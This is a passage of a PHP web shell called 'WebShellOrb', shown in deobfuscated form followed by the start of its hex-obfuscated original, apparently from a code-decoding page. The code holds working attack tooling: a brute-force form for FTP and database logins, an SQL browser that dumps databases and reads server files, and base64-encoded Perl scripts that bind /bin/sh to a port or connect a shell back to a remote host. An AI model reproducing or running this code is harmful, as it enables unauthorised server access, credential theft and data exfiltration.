echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value=\"" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value=\"" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value=\"127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1\" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px\"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value=\"2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px\"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root\"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value=\"" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic\"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>\"></td></tr></form></table>";
echo "</div><br>";
WebShellOrbFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function DbClass7($type)
{
$this->type = ${${"GLOBALS"}["vxhdoihqlkd"]};
}
function connect($host, $user, $pass, $dbname)
{
${"GLOBALS"}["nokxynmmh"] = "user";
switch ($this->type) {
case "mysql":
if ($this->link = @mysql_connect($host, ${${"GLOBALS"}["nokxynmmh"]}, ${${"GLOBALS"}["icduirvc"]}, true))
return true;
break;
case "pgsql":
$host = explode(":", $host);
if (!$host[1])
$host[1] = 5432;
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))
return true;
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "mysql":
if (@mysql_select_db(${${"GLOBALS"}["bopmwejgirf"]}))
return true;
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "mysql":
return $this->res = @mysql_query(${${"GLOBALS"}["lhydmmywwn"]});
break;
case "pgsql":
return $this->res = @pg_query($this->link, ${${"GLOBALS"}["lhydmmywwn"]});
break;
}
return false;
}
function fetch()
{
$cqtiiytoxs = "res";
$lmqgccr = "res";
${${"GLOBALS"}["ymhnnp"]} = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case "mysql":
return @mysql_fetch_assoc(${$cqtiiytoxs});
break;
case "pgsql":
return @pg_fetch_assoc(${$lmqgccr});
break;
}
return false;
}
function listDbs()
{
switch ($this->type) {
case "mysql":
return $this->query("SHOW databases");
break;
case "pgsql":
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "mysql":
return $this->res = $this->query("SHOW TABLES");
break;
case "pgsql":
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "mysql":
return @mysql_error();
break;
case "pgsql":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
${"GLOBALS"}["eqobysgmaof"] = "str";
switch ($this->type) {
case "mysql":
if (function_exists("mysql_set_charset"))
return @mysql_set_charset(${${"GLOBALS"}["lhydmmywwn"]}, $this->link);
else
$this->query("SET CHARSET " . ${${"GLOBALS"}["lhydmmywwn"]});
break;
case "pgsql":
return @pg_set_client_encoding($this->link, ${${"GLOBALS"}["eqobysgmaof"]});
break;
}
return false;
}
function loadFile($str)
{
${"GLOBALS"}["iftfhykrv"] = "r";
$kvjjxcllg = "str";
$zuwohcpx = "r";
switch ($this->type) {
case "mysql":
return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes(${${"GLOBALS"}["lhydmmywwn"]}) . "') as file"));
break;
case "pgsql":
$this->query("CREATE TABLE WebShellOrb2(file text);COPY WebShellOrb2 FROM '" . addslashes(${$kvjjxcllg}) . "';select file from WebShellOrb2;");
${$zuwohcpx} = array();
while (${${"GLOBALS"}["clkuyojj"]} = $this->fetch())
${${"GLOBALS"}["mwpoytmwus"]}[] = ${${"GLOBALS"}["clkuyojj"]}["file"];
$this->query("drop table WebShellOrb2");
return array(
"file" => implode("
", ${${"GLOBALS"}["iftfhykrv"]})
);
break;
}
return false;
}
function dump($table, $fp = false)
{
$lvspedl = "table";
${"GLOBALS"}["hclxgckv"] = "create";
${"GLOBALS"}["bevvydk"] = "res";
$fxcpioaubjb = "table";
${"GLOBALS"}["vzlphuccp"] = "i";
${"GLOBALS"}["llrslc"] = "sql";
${"GLOBALS"}["qvbkbpidxc"] = "item";
$gdtnlefrsw = "item";
switch ($this->type) {
case "mysql":
${${"GLOBALS"}["ymhnnp"]} = $this->query("SHOW CREATE TABLE `" . ${$lvspedl} . "`");
${${"GLOBALS"}["lfljrdmc"]} = mysql_fetch_array(${${"GLOBALS"}["bevvydk"]});
${${"GLOBALS"}["lwqrio"]} = ${${"GLOBALS"}["hclxgckv"]}[1] . ";
";
if (${${"GLOBALS"}["tbrhqbi"]})
fwrite(${${"GLOBALS"}["tbrhqbi"]}, ${${"GLOBALS"}["lwqrio"]});
else
echo (${${"GLOBALS"}["llrslc"]});
$this->query("SELECT * FROM `" . ${$fxcpioaubjb} . "`");
${${"GLOBALS"}["vzlphuccp"]} = 0;
${${"GLOBALS"}["sdigtdgih"]} = true;
while (${$gdtnlefrsw} = $this->fetch()) {
${${"GLOBALS"}["lwqrio"]} = "";
${"GLOBALS"}["xbengs"] = "columns";
$xobgpipr = "sql";
if (${${"GLOBALS"}["clkuyojj"]} % 1000 == 0) {
${"GLOBALS"}["xhbwyioli"] = "head";
$ogmpcygtnlp = "sql";
${${"GLOBALS"}["xhbwyioli"]} = true;
${$ogmpcygtnlp} = ";
";
}
$cokvjkyzuyu = "v";
$nxxfdqradvx = "k";
${${"GLOBALS"}["xbengs"]} = array();
foreach (${${"GLOBALS"}["bdmqwqvfqn"]} as ${$nxxfdqradvx} => ${$cokvjkyzuyu}) {
$adukszrwybrf = "item";
$tlgrwbkwwn = "k";
${"GLOBALS"}["smdpfjdpe"] = "item";
${"GLOBALS"}["ymypptmvdpea"] = "item";
${"GLOBALS"}["pgbiqyzdgjc"] = "v";
${"GLOBALS"}["bfnoqmsvfd"] = "k";
if (${${"GLOBALS"}["pgbiqyzdgjc"]} === null)
${${"GLOBALS"}["ymypptmvdpea"]}[${$tlgrwbkwwn}] = "NULL";
elseif (is_int(${${"GLOBALS"}["vvdxmjbgec"]}))
${${"GLOBALS"}["smdpfjdpe"]}[${${"GLOBALS"}["bfnoqmsvfd"]}] = ${${"GLOBALS"}["vvdxmjbgec"]};
else
${$adukszrwybrf}[${${"GLOBALS"}["oqvryxe"]}] = "'" . @mysql_real_escape_string(${${"GLOBALS"}["vvdxmjbgec"]}) . "'";
${${"GLOBALS"}["amehtg"]}[] = "`" . ${${"GLOBALS"}["oqvryxe"]} . "`";
}
$ykwbodcd = "sql";
$wqbpixdcuh = "fp";
if (${${"GLOBALS"}["sdigtdgih"]}) {
$prlzshyyi = "sql";
$jotets = "table";
${$prlzshyyi} .= "INSERT INTO `" . ${$jotets} . "` (" . implode(", ", ${${"GLOBALS"}["amehtg"]}) . ") VALUES
(" . implode(", ", ${${"GLOBALS"}["bdmqwqvfqn"]}) . ")";
${${"GLOBALS"}["sdigtdgih"]} = false;
} else
${$xobgpipr} .= "
,(" . implode(", ", ${${"GLOBALS"}["bdmqwqvfqn"]}) . ")";
if (${$wqbpixdcuh})
fwrite(${${"GLOBALS"}["tbrhqbi"]}, ${$ykwbodcd});
else
echo (${${"GLOBALS"}["lwqrio"]});
${${"GLOBALS"}["clkuyojj"]}++;
}
if (!${${"GLOBALS"}["sdigtdgih"]}) {
$gitelgqh = "fp";
$dhwspxr = "fp";
if (${$gitelgqh})
fwrite(${$dhwspxr}, ";
");
else
echo (";
");
}
break;
case "pgsql":
$this->query("SELECT * FROM " . ${${"GLOBALS"}["txyjmywp"]});
while (${${"GLOBALS"}["qvbkbpidxc"]} = $this->fetch()) {
$dijwkkaxtwh = "v";
${"GLOBALS"}["jwcglmiytjkt"] = "columns";
${"GLOBALS"}["kqlgwiwhg"] = "item";
${"GLOBALS"}["ickjifzf"] = "fp";
${"GLOBALS"}["bhlsyccmb"] = "sql";
${"GLOBALS"}["rqdqvrt"] = "sql";
${"GLOBALS"}["gbnsld"] = "item";
${"GLOBALS"}["ntmqvqy"] = "table";
${${"GLOBALS"}["amehtg"]} = array();
foreach (${${"GLOBALS"}["gbnsld"]} as ${${"GLOBALS"}["oqvryxe"]} => ${$dijwkkaxtwh}) {
$xtthgqq = "k";
${"GLOBALS"}["imrmoiac"] = "k";
${${"GLOBALS"}["bdmqwqvfqn"]}[${$xtthgqq}] = "'" . addslashes(${${"GLOBALS"}["vvdxmjbgec"]}) . "'";
${${"GLOBALS"}["amehtg"]}[] = ${${"GLOBALS"}["imrmoiac"]};
}
${${"GLOBALS"}["bhlsyccmb"]} = "INSERT INTO " . ${${"GLOBALS"}["ntmqvqy"]} . " (" . implode(", ", ${${"GLOBALS"}["jwcglmiytjkt"]}) . ") VALUES (" . implode(", ", ${${"GLOBALS"}["kqlgwiwhg"]}) . ");" . "
";
if (${${"GLOBALS"}["tbrhqbi"]})
fwrite(${${"GLOBALS"}["ickjifzf"]}, ${${"GLOBALS"}["lwqrio"]});
else
echo (${${"GLOBALS"}["rqdqvrt"]});
}
break;
}
return false;
}
}
${${"GLOBALS"}["bopmwejgirf"]} = new DbClass7($_POST["type"]);
if ((@$_POST["p2"] == "download") && (@$_POST["p1"] != "select")) {
$db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]);
$db->selectdb($_POST["sql_base"]);
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
if (empty($_POST["file"])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST["tbl"] as ${${"GLOBALS"}["vvdxmjbgec"]})
$db->dump(${${"GLOBALS"}["vvdxmjbgec"]});
exit;
} elseif (${${"GLOBALS"}["tbrhqbi"]} = @fopen($_POST["file"], "w")) {
${"GLOBALS"}["igwncuwljhcx"] = "v";
$azcjoee = "fp";
foreach ($_POST["tbl"] as ${${"GLOBALS"}["igwncuwljhcx"]})
$db->dump(${${"GLOBALS"}["vvdxmjbgec"]}, ${$azcjoee});
fclose(${${"GLOBALS"}["tbrhqbi"]});
unset($_POST["p2"]);
} else
die("<script>alert(\"Error! Can't open file\");window.history.back(-1)</script>");
}
WebShellOrbHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : "") . "'>
<td><select name='type'><option value='mysql' ";
if (@$_POST["type"] == "mysql")
echo "selected";
echo ">MySql</option><option value='pgsql' ";
if (@$_POST["type"] == "pgsql")
echo "selected";
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>
<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . "\"></td>
<td><input type=text name=sql_pass value=\"" . (empty($_POST["sql_pass"]) ? "" : htmlspecialchars($_POST["sql_pass"])) . ""></td><td>";
${${"GLOBALS"}["ecbcmiybue"]} = "<input type=text name=sql_base value=''>";
if (isset($_POST["sql_host"])) {
${"GLOBALS"}["hojznwhnacpf"] = "tmp";
if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) {
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while (${${"GLOBALS"}["bdmqwqvfqn"]} = $db->fetch()) {
$vutoobappnb = "item";
${"GLOBALS"}["dhnqkey"] = "value";
$dtvsszkh = "key";
list(${$dtvsszkh}, ${${"GLOBALS"}["xrdbnxfmvt"]}) = each(${$vutoobappnb});
echo "<option value="" . ${${"GLOBALS"}["xrdbnxfmvt"]} . "" " . (${${"GLOBALS"}["xrdbnxfmvt"]} == $_POST["sql_base"] ? "selected" : "") . ">" . ${${"GLOBALS"}["dhnqkey"]} . "</option>";
}
echo "</select>";
} else
echo ${${"GLOBALS"}["hojznwhnacpf"]};
} else
echo ${${"GLOBALS"}["ecbcmiybue"]};
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? "" : " checked") . "> count the number of rows</td>
</tr>
</table>
<script>
s_db='" . @addslashes($_POST["sql_base"]) . "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if (isset(${${"GLOBALS"}["bopmwejgirf"]}) && $db->link) {
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST["sql_base"])) {
$nejkldo = "item";
$db->selectdb($_POST["sql_base"]);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
${${"GLOBALS"}["dncwbwlrbd"]} = $db->listTables();
while (${$nejkldo} = $db->fetch(${${"GLOBALS"}["dncwbwlrbd"]})) {
${"GLOBALS"}["zsyujlxatpw"] = "value";
${"GLOBALS"}["eahhvigh"] = "value";
list(${${"GLOBALS"}["oocwabo"]}, ${${"GLOBALS"}["eahhvigh"]}) = each(${${"GLOBALS"}["bdmqwqvfqn"]});
if (!empty($_POST["sql_count"]))
${${"GLOBALS"}["onmdrx"]} = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . ${${"GLOBALS"}["xrdbnxfmvt"]} . ""));
${${"GLOBALS"}["xrdbnxfmvt"]} = htmlspecialchars(${${"GLOBALS"}["xrdbnxfmvt"]});
echo "<nobr><input type='checkbox' name='tbl[]' value='" . ${${"GLOBALS"}["xrdbnxfmvt"]} . "'> <a href=# onclick="st('" . ${${"GLOBALS"}["xrdbnxfmvt"]} . "',1)">" . ${${"GLOBALS"}["zsyujlxatpw"]} . "</a>" . (empty($_POST["sql_count"]) ? " " : " <small>({$n['n']})</small>") . "</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST["p1"] == "select") {
$_POST["p1"] = "query";
${"GLOBALS"}["yctjrlsembz"] = "num";
${"GLOBALS"}["fyolkb"] = "pages";
$_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1;
$db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]);
${"GLOBALS"}["kjbkzekyzkk"] = "pages";
${${"GLOBALS"}["yctjrlsembz"]} = $db->fetch();
${"GLOBALS"}["rbfkfawwlp"] = "num";
${${"GLOBALS"}["kjbkzekyzkk"]} = ceil(${${"GLOBALS"}["rbfkfawwlp"]}["n"] / 30);
echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int) $_POST["p3"]) . ">";
echo " of $pages";
if ($_POST["p3"] > 1)
echo " <a href=# onclick='st("" . $_POST["p2"] . "\", " . ($_POST["p3"] - 1) . ")'>< Prev</a>";
if ($_POST["p3"] < ${${"GLOBALS"}["fyolkb"]})
echo " <a href=# onclick='st("" . $_POST["p2"] . "\", " . ($_POST["p3"] + 1) . ")'>Next ></a>";
$_POST["p3"]--;
if ($_POST["type"] == "pgsql")
$_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . ($_POST["p3"] * 30);
else
$_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . ($_POST["p3"] * 30) . ",30";
echo "<br><br>";
}
if ((@$_POST["p1"] == "query") && !empty($_POST["p2"])) {
$db->query(@$_POST["p2"]);
if ($db->res !== false) {
$qkoefjgtvmo = "line";
$ofantutk = "item";
${${"GLOBALS"}["gletwnspjntd"]} = false;
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">";
${$qkoefjgtvmo} = 1;
while (${$ofantutk} = $db->fetch()) {
${"GLOBALS"}["gpbpqsokr"] = "title";
if (!${${"GLOBALS"}["gpbpqsokr"]}) {
$kmifpskdrsr = "item";
$cmpvdluse = "title";
$gldaewbitzp = "value";
${"GLOBALS"}["pqxgkwxjuja"] = "item";
${"GLOBALS"}["uydjahhmdtj"] = "key";
echo "<tr>";
foreach (${$kmifpskdrsr} as ${${"GLOBALS"}["oocwabo"]} => ${$gldaewbitzp})
echo "<th>" . ${${"GLOBALS"}["uydjahhmdtj"]} . "</th>";
reset(${${"GLOBALS"}["pqxgkwxjuja"]});
${$cmpvdluse} = true;
echo "</tr><tr>";
${${"GLOBALS"}["omanxfropl"]} = 2;
}
${"GLOBALS"}["jlubwufpnia"] = "item";
$xxrzgvkzrf = "key";
echo "<tr class="l" . ${${"GLOBALS"}["omanxfropl"]} . "">";
${${"GLOBALS"}["omanxfropl"]} = ${${"GLOBALS"}["omanxfropl"]} == 1 ? 2 : 1;
foreach (${${"GLOBALS"}["jlubwufpnia"]} as ${$xxrzgvkzrf} => ${${"GLOBALS"}["xrdbnxfmvt"]}) {
if (${${"GLOBALS"}["xrdbnxfmvt"]} == null)
echo "<td><i>null</i></td>";
else
echo "<td>" . nl2br(htmlspecialchars(${${"GLOBALS"}["xrdbnxfmvt"]})) . "</td>";
}
echo "</tr>";
}
echo "</table>";
} else {
echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>";
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST["p2"]) && ($_POST["p1"] != "loadfile"))
echo htmlspecialchars($_POST["p2"]);
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
if ($_POST["type"] == "mysql") {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if ($db->fetch())
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
if (@$_POST["p1"] == "loadfile") {
${${"GLOBALS"}["kmiihcqpanrs"]} = $db->loadFile($_POST["p2"]);
echo "<br/><pre class=ml1>" . htmlspecialchars(${${"GLOBALS"}["kmiihcqpanrs"]}["file"]) . "</pre>";
}
} else {
echo htmlspecialchars($db->error());
}
echo "</div>";
WebShellOrbFooter();
}
function actionNetwork()
{
${"GLOBALS"}["nyxzxhcxu"] = "back_connect_p";
WebShellOrbHeader();
${${"GLOBALS"}["nyxzxhcxu"]} = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
${"GLOBALS"}["nlhhszig"] = "bind_port_p";
${${"GLOBALS"}["nlhhszig"]} = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form>
<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form><br>";
if (isset($_POST["p1"])) {
function cf($f, $t)
{
$xcwsiljfsd = "f";
$lwuzjrm = "w";
${$lwuzjrm} = @fopen(${$xcwsiljfsd}, "w") or @function_exists("file_put_contents");
if (${${"GLOBALS"}["eelpcfsuym"]}) {
${"GLOBALS"}["hoomqvh"] = "w";
@fwrite(${${"GLOBALS"}["hoomqvh"]}, @base64_decode(${${"GLOBALS"}["rnphbwgqyad"]}));
@fclose(${${"GLOBALS"}["eelpcfsuym"]});
}
}
if ($_POST["p1"] == "bpp") {
cf("/tmp/bp.pl", ${${"GLOBALS"}["jbzeoab"]});
${"GLOBALS"}["vrlkxlnjx"] = "out";
${${"GLOBALS"}["vrlkxlnjx"]} = WebShellOrbEx("perl /tmp/bp.pl " . $_POST["p2"] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>$out
" . WebShellOrbEx("ps aux | grep bp.pl") . "</pre>";
unlink("/tmp/bp.pl");
}
if ($_POST["p1"] == "bcp") {
${"GLOBALS"}["xycugtp"] = "back_connect_p";
${"GLOBALS"}["tmkpcjp"] = "out";
cf("/tmp/bc.pl", ${${"GLOBALS"}["xycugtp"]});
${${"GLOBALS"}["tmkpcjp"]} = WebShellOrbEx("perl /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>$out
" . WebShellOrbEx("ps aux | grep bc.pl") . "</pre>";
unlink("/tmp/bc.pl");
}
}
echo "</div>";
WebShellOrbFooter();
}
if (empty($_POST["a"])) {
$lzspptfkyf = "default_action";
$jwpwgpdoyx = "default_action";
if (isset(${${"GLOBALS"}["jehnwkvhq"]}) && function_exists("action" . ${$lzspptfkyf}))
$_POST["a"] = ${$jwpwgpdoyx};
else
$_POST["a"] = "SecInfo";
}
if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"]))
call_user_func("action" . $_POST["a"]);
exit; ?>Did this file decode correctly?
Original Code
<?php
${"\x47L\x4f\x42A\x4cS"}["\x6a\x65\x68n\x77\x6b\x76\x68q"] = "d\x65\x66\x61\x75l\x74\x5f\x61\x63\x74\x69on";
${"\x47\x4c\x4fB\x41L\x53"}["jbz\x65\x6f\x61b"] = "b\x69\x6e\x64_\x70\x6f\x72\x74\x5fp";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x6e\x70\x68\x62\x77\x67\x71y\x61\x64"] = "\x74";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x65e\x6cp\x63\x66\x73\x75\x79\x6d"] = "\x77";
${"\x47\x4c\x4fBA\x4c\x53"}["\x6b\x6di\x69h\x63qp\x61\x6e\x72\x73"] = "\x66i\x6c\x65";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x67le\x74\x77n\x73\x70\x6a\x6et\x64"] = "t\x69t\x6ce";
${"\x47L\x4fB\x41LS"}["\x64\x6e\x63w\x62w\x6c\x72\x62d"] = "tbl\x73_\x72\x65s";
${"\x47LO\x42\x41\x4c\x53"}["\x78\x72\x64\x62\x6ex\x66\x6d\x76\x74"] = "\x76\x61\x6c\x75\x65";
${"\x47LO\x42\x41\x4c\x53"}["t\x78\x79\x6a\x6dy\x77p"] = "\x74\x61\x62le";
${"\x47L\x4f\x42\x41\x4cS"}["a\x6de\x68\x74\x67"] = "c\x6flu\x6dns";
${"G\x4cOB\x41L\x53"}["sd\x69\x67\x74\x64\x67\x69h"] = "\x68\x65\x61\x64";
${"\x47L\x4fB\x41\x4c\x53"}["\x6c\x77\x71\x72i\x6f"] = "s\x71\x6c";
${"G\x4c\x4f\x42A\x4cS"}["\x6c\x66lj\x72\x64m\x63"] = "\x63\x72\x65\x61te";
${"G\x4c\x4f\x42A\x4cS"}["l\x68\x79d\x6dm\x79\x77\x77\x6e"] = "\x73t\x72";
${"\x47\x4cOB\x41\x4cS"}["\x62opmw\x65\x6ag\x69\x72f"] = "d\x62";
${"G\x4cOBAL\x53"}["\x6f\x6d\x61\x6ex\x66\x72\x6fpl"] = "\x6ci\x6e\x65";
${"\x47LOB\x41\x4c\x53"}["\x6e\x6e\x77\x74\x63\x6e\x76\x76"] = "ser\x76\x65r";
${"\x47\x4c\x4fBA\x4c\x53"}["\x63\x69v\x6b\x67\x6b\x6b\x63"] = "\x61t\x74empt\x73";
${"G\x4cO\x42A\x4c\x53"}["\x6e\x73\x63\x71aqn"] = "\x73\x75\x63\x63\x65s\x73";
${"GLOB\x41\x4c\x53"}["\x62d\x72\x6c\x77\x6a\x74t\x6b"] = "l\x6f\x67\x69\x6e";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x69c\x64\x75ir\x76\x63"] = "\x70\x61ss";
${"\x47\x4cO\x42A\x4c\x53"}["y\x6dhn\x6e\x70"] = "\x72\x65\x73";
${"G\x4cO\x42\x41\x4c\x53"}["\x6e\x68\x65g\x79\x75\x6ak\x62\x67"] = "\x70\x6fr\x74";
${"G\x4c\x4f\x42\x41L\x53"}["qe\x6c\x61\x73\x67\x6d\x6fq"] = "\x69p";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73r\x68\x70\x75\x6e\x6f"] = "\x6ce\x6e";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x72\x69fo\x68o\x6a\x75"] = "\x74\x69\x6de";
${"\x47\x4c\x4fB\x41\x4c\x53"}["bgb\x6e\x64\x67\x6c\x77"] = "p\x65\x72\x6ds";
${"G\x4cO\x42A\x4c\x53"}["\x74b\x72\x68\x71\x62\x69"] = "\x66\x70";
${"G\x4c\x4fB\x41L\x53"}["\x67\x69g\x73m\x71\x79\x6f\x77\x62"] = "p\x61th\x73";
${"\x47\x4cOBAL\x53"}["dyv\x74h\x65\x74"] = "\x73\x74\x72\x69\x6e\x67\x54o\x6f\x6cs";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6dw\x70\x6fy\x74\x6d\x77u\x73"] = "\x72";
${"\x47\x4cOB\x41\x4cS"}["\x67\x61y\x61\x69\x6f"] = "l";
${"\x47\x4c\x4f\x42\x41LS"}["s\x6cz\x62u\x67\x64s"] = "\x62";
